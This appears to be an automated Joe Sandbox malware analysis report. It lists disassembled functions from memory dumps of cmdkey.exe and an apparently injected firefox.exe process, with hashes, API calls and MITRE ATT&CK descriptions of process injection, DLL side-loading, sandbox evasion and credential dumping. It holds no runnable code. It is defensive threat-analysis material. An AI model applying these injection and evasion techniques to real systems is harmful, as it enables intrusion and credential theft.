Opcode Fuzzy Hash: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
Instruction Fuzzy Hash: E6020D74528B8C8FCBA9EF68C894AEE77E1FB99304F00462D954AC7240DF34D645CB42

Function 036D34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036D34EA

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a304d286d15099c2536f780c1ff1f3ab888e1e718eb2ec8607690b1b9ba4c48
Instruction ID: 9096e0623e4ed818d8e5ba2eb5838dc3a6f13b9c919a5790e50feb7cd7614f86
Opcode Fuzzy Hash: 4a304d286d15099c2536f780c1ff1f3ab888e1e718eb2ec8607690b1b9ba4c48
Instruction Fuzzy Hash: EA90023160620802D500A6584614707100587D0601F61C815A4424668DC7A5895575A2

Function 036D2B00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2B0A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aaf0e78aeaa70d5b8733041e469c9d5447b0bbe898522d1e4dd779c231c9f3c5
Instruction ID: ace149f5eaa6a6d44a0d396deb826689b471f9895a6dcc02af80db465d2db512
Opcode Fuzzy Hash: aaf0e78aeaa70d5b8733041e469c9d5447b0bbe898522d1e4dd779c231c9f3c5
Instruction Fuzzy Hash: 0B90023120614C42D540B6584504A47001587D0705F51C415A4064794DD7358D59B661

Function 036D2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2B1A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ac868a080bc300cddf1287740bb8804095504b9f7f6fb7108f9f9ace24a57ce
Instruction ID: bf44ce25e1df81ae5da965bf80af841b93a93efb2e8ae9e8b889ba5888422acc
Opcode Fuzzy Hash: 6ac868a080bc300cddf1287740bb8804095504b9f7f6fb7108f9f9ace24a57ce
Instruction Fuzzy Hash: A290023120210C02D580B658450464B000587D1701F91C419A4025754DCB258A5D77A1

Function 036D2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2BCA

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0f697a81124df92ef7fdcf2caeaeb000085d3e437de8429dba05061782002dd
Instruction ID: aa46c125ae245ad92a2a8ab29f892b955ad60c0df5fda4599ebe5f4c316e9d88
Opcode Fuzzy Hash: d0f697a81124df92ef7fdcf2caeaeb000085d3e437de8429dba05061782002dd
Instruction Fuzzy Hash: F490023120210802D500AA985508647000587E0701F51D415A9024655EC77588957131

Function 036D2B80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2B8A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d71f0a831affa03fefd704c0e45f5cc886c857d239163ade9100788ec64bffef
Instruction ID: 0062491834b5ace17865e72738968c54c2e225bfd1cf44aee137210f21c876a1
Opcode Fuzzy Hash: d71f0a831affa03fefd704c0e45f5cc886c857d239163ade9100788ec64bffef
Instruction Fuzzy Hash: 5D90023120210C42D500A6584504B47000587E0701F51C41AA4124754DC725C8557521

Function 036D2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2B9A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 471836dcdd606007e1f2971c177e32c1defe381689425ec0b4d51e162a74194c
Instruction ID: 2372d84754798492d01a8175d01a1dec2018737b9269046d74518ee57963d2af
Opcode Fuzzy Hash: 471836dcdd606007e1f2971c177e32c1defe381689425ec0b4d51e162a74194c
Instruction Fuzzy Hash: 5790023120218C02D510A658850474B000587D0701F55C815A8424758DC7A588957121

Function 036D2A10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2A1A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 469b8cf63f2b0ab6fba1bf664629a7ec3f447ca396a3897eac75b2f6cf31d321
Instruction ID: 7ecc1e2edc151b230c1e266766f8268c4c0888700d8986ed148f2c422c4c1e6e
Opcode Fuzzy Hash: 469b8cf63f2b0ab6fba1bf664629a7ec3f447ca396a3897eac75b2f6cf31d321
Instruction Fuzzy Hash: AD900225222104024545EA58070450B044597D6751391C419F5416690CC73188696321

Function 036D2AC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2ACA

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b81470f639a5ac5a6f8563a284aedadb73c49d2c1c2a936e9f0622613de069b2
Instruction ID: 2ed8d14fa0516ff60110ac5b69976ce196d919e1576ab2b9b91ed14858df04d3
Opcode Fuzzy Hash: b81470f639a5ac5a6f8563a284aedadb73c49d2c1c2a936e9f0622613de069b2
Instruction Fuzzy Hash: 9090023160610C02D550B6584514747000587D0701F51C415A4024754DC7658A5976A1

Function 036D2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2A8A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24232cec758901c566f577dc3da0e8e4e92ebf5b3ed8af121cd7ae921f269c88
Instruction ID: e3842a129fe8bedd14bc68f96a73fa4bbe9ec5a35446e0c777d0f6a30c565e77
Opcode Fuzzy Hash: 24232cec758901c566f577dc3da0e8e4e92ebf5b3ed8af121cd7ae921f269c88
Instruction Fuzzy Hash: 86900261203104038505B6584514617400A87E0601B51C425E5014690DC63588957125

Function 036D29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D29FA

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c592afd285cf7aa51031bf38eb8236e65eb3202928fc55c814de1c9d8a794e7a
Instruction ID: ef64bb2f4f7be49a7741d778bea8eacc7c90d9be8e4213813cfb63b48a1ff421
Opcode Fuzzy Hash: c592afd285cf7aa51031bf38eb8236e65eb3202928fc55c814de1c9d8a794e7a
Instruction Fuzzy Hash: F0900435313104034505FF5C07045070047C7D5751351C435F5015750CD731CC757131

Function 036D2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036D2F0A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9947ccd347aca38717a3983add41b6f9c32f1ab1f0ce32576c10882264050000
Instruction ID: ff84e099b349e6f5461e67788bc0d61aa67f50a838029a5f907ef40b528d24c0
Opcode Fuzzy Hash: 9947ccd347aca38717a3983add41b6f9c32f1ab1f0ce32576c10882264050000
Instruction Fuzzy Hash: 0390022121290442D600AA684D14B07000587D0703F51C519A4154654CCA2588656521

Function 036D2E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2E5A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec05bccf8ebc0146027ebd0c0c56675dd2c284825722077c7d993d251ce3272b
Instruction ID: 6ebf62f7f450d01f8cda1523923aee4f600892b8531dcdacbd00baf7df504e7a
Opcode Fuzzy Hash: ec05bccf8ebc0146027ebd0c0c56675dd2c284825722077c7d993d251ce3272b
Instruction Fuzzy Hash: DD90026134210842D500A6584514B070005C7E1701F51C419E5064654DC729CC567126

Function 036D2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2D1A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01c8ba4a033a3fb34499e591e32867c05d49d572f4aadadc8bf5bea7b4f0a58a
Instruction ID: 26f4988adad4d41c2239e02fa7546d8228a528f0e9eafcbeaeed791f241a00dc
Opcode Fuzzy Hash: 01c8ba4a033a3fb34499e591e32867c05d49d572f4aadadc8bf5bea7b4f0a58a
Instruction Fuzzy Hash: AA90023120210813D511A6584604707000987D0641F91C816A4424658DD7668956B121

Function 036D2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2C3A

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cfc18c52441b2235d2993a96d008f18afad9e6f68654adf294c80acaef6f4ca
Instruction ID: 052c24333c4a493a2ef92274c2e5c324aa8e14342f3cbbd113118ca2ffe40777
Opcode Fuzzy Hash: 8cfc18c52441b2235d2993a96d008f18afad9e6f68654adf294c80acaef6f4ca
Instruction Fuzzy Hash: 8F90022921310402D580B658550860B000587D1602F91D819A4015658CCA25886D6321

Function 036D2CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2CFA

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2fa6730f2bae15e2421042a43406be6f8395e0a3409455a53de933cf386e37e
Instruction ID: a31641efec1e15c9e4e3c11fc8428449f613bfc24962d836e5486dd71c1bcf92
Opcode Fuzzy Hash: d2fa6730f2bae15e2421042a43406be6f8395e0a3409455a53de933cf386e37e
Instruction Fuzzy Hash: 4C900221243145529945F6584504507400697E0641791C416A5414A50CC636985AE621

Function 036D2B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 036D2B44

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 881af93d2326e485984e98222f94fde68a54269915a502eb85b23405b90082c6
Instruction ID: 6331158c1eee9207ac6e4a9c79a4ec88a9c0ebb0bc6817e0024f80c725c1ab00
Opcode Fuzzy Hash: 881af93d2326e485984e98222f94fde68a54269915a502eb85b23405b90082c6
Instruction Fuzzy Hash: 36B09272D025C9CAEA11EB604B08B1B7E14BBD0B05F2AC8A6E2470791E8778C095F276

Non-executed Functions

Function 036C7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03704507
ExecuteOptions, xrefs: 037044AB
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0370454D
CLIENT(ntdll): Processing section info %ws..., xrefs: 03704592
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03704460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03704530
Execute=1, xrefs: 0370451E

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1a68e4d6fe2548c25dbaa36e45a816ae5c483fd1b0453bc929f4f702878d45cf
Instruction ID: 0c5941c37ec421fc5115e351fd3583df2ef4440bea39f11115434dcee2eda9c9
Opcode Fuzzy Hash: 1a68e4d6fe2548c25dbaa36e45a816ae5c483fd1b0453bc929f4f702878d45cf
Instruction Fuzzy Hash: F6510831A10359AEEF20EBA5DC99FBD73ACEF08340F4404ADD905AB281DB709A51CF64

Function 03699046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 036990B1
@, xrefs: 03699095

Memory Dump Source

Source File: 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: true

Associated: 00000004.00000002.110844799317.0000000003789000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3660000_cmdkey.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: dcb546914d9de2278548c6b524410e618db7c82ef1c3467f23940a714ca290ac
Instruction ID: e167138d4c618e3da9b7c8fa3b6594008d9dc021f5c37661b3c38aec0dc8ef97
Opcode Fuzzy Hash: dcb546914d9de2278548c6b524410e618db7c82ef1c3467f23940a714ca290ac
Instruction Fuzzy Hash: 7C814A75D002699BDB35CF54CD44BEEB7B8AB08710F0445EAEA19B7240D7709E85CFA4

Analysis Process: firefox.exePID: 9172, Parent PID: 9064COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	41
Total number of Limit Nodes:	3

Executed Functions

Function 0000019FCC57B933 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 0000019FCC57B99B

Memory Dump Source

Source File: 00000005.00000002.107575992522.0000019FCC570000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000019FCC570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19fcc570000_firefox.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: d1dec6e9141cc035298547e73bb2619bd33a22ec2689c1bd68a02d31e780b081
Instruction ID: 2a7d77b9b25b3836a03d7aeb4a447b82cd93b4d9c10f3cad693e4c6f1388620a
Opcode Fuzzy Hash: d1dec6e9141cc035298547e73bb2619bd33a22ec2689c1bd68a02d31e780b081
Instruction Fuzzy Hash: 73419A32E2C6485FE7159F24D095BEAB7D0EB85320F048D7DD489CB182EA21B587C781

Function 0000019FCC587F9B Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.107575992522.0000019FCC570000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000019FCC570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19fcc570000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8467edb3424e5c6f5c1f47852cba62e45a42585a65e55f85e8eed34cd4f9faae
Instruction ID: e9bef7ede0b4a99ccc9b5ba542b1bc579bd346f4c7ef147161208a537110bd77
Opcode Fuzzy Hash: 8467edb3424e5c6f5c1f47852cba62e45a42585a65e55f85e8eed34cd4f9faae
Instruction Fuzzy Hash: 4641A530A5464D6FEBA4AB3488A5BED76D0FB55300F558D7D945AC61C3CE38E84EC342

Function 0000019FCC57C611 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 0000019FCC57C660

Memory Dump Source

Source File: 00000005.00000002.107575992522.0000019FCC570000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000019FCC570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19fcc570000_firefox.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1e686263ae5ff24f28254933dd1bbfa1eb0d8607f8ba1d348c97e1b39488b58e
Instruction ID: 27bd43659246352a33c6841d1d644744ba1d630db63d856f1d1c62778980463a
Opcode Fuzzy Hash: 1e686263ae5ff24f28254933dd1bbfa1eb0d8607f8ba1d348c97e1b39488b58e
Instruction Fuzzy Hash: 6E21D770D34A0C6FEB55DF2E94E0BE972D0FB88700F559D7DE84AC7183CA24A8824B81

Function 0000019FCC585A28 Relevance: 1.6, APIs: 1, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 0000019FCC585AA1

Memory Dump Source

Source File: 00000005.00000002.107575992522.0000019FCC570000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000019FCC570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19fcc570000_firefox.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ae54d5f5e8390d96b5b79a241ef8240e47e29c0e6253ce2343724ff47f6c6f88
Instruction ID: 97696ce065190256de7079e021f9f8bfc903139bc5fb9213bb052d2975c58d41
Opcode Fuzzy Hash: ae54d5f5e8390d96b5b79a241ef8240e47e29c0e6253ce2343724ff47f6c6f88
Instruction Fuzzy Hash: 5201B531A08A0C5BE754E724C8D9BEB73D5FB98305F404D3E644DC2195EA38E649C742

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
